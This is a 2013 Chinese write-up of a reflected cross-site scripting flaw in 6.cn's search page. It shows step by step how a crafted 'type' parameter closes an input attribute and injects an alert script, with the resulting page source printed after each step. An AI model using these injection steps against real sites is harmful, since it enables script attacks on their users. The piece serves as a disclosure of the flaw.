Author:H3art Data:Jan 16,2013 漏洞 页面:http://v.6.cn/search.php?key&type= 现在type后面随便填写一个,然后再查看 源码 。 http://v.6.cn/search.php?key&type=xss
<a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a>
<div class="search">
<form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss" id="input_type" />
<div class="searchBox"> <span class="soInput">
<input type="text" name="key" value=""/>
</span>
<div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>
<div class="soTypeList"> 从 <input type="hidden" name="type" autocomplete="off" value="xss" id="input_type" />分析。而这个xss就是我们刚才输入的值。可见value是控制用户输入的。下面我们在里面输入xss[>把前面的input闭合一下。 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a>
<div class="search">
<form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss">" id="input_type" />
<div class="searchBox"> <span class="soInput">
<input type="text" name="key" value=""/>
</span>
<div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>
<div class="soTypeList">
大家可以看到 当你闭合之后 后面的 " id="input_type" />就在页面显示出来了。 我们输入xss]><script>alert("xss by H3art")</script> 再分析一下源代码
<a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a>
<div class="search">
<form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss"><script>alert("xss by H3art")</script>" id="input_type" />
<div class="searchBox"> <span class="soInput">
<input type="text" name="key" value=""/>
</span>
<div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>
<div class="soTypeList"> 接着输入 xss]><script>alert("xss by H3art")</script><input type="xss" name="xss
<a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a><div class="search">
<form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss"><script>alert("xss by H3art")</script><input type="xss" name="xss" id="input_type" />
<div class="searchBox"> <span class="soInput">
这个漏洞可以说跟 前段时间 土豆网爆出的xss 一样。。
查看更多关于6间房(6.cn)XSS反射型漏洞 - 网站安全 - 自学php的详细内容...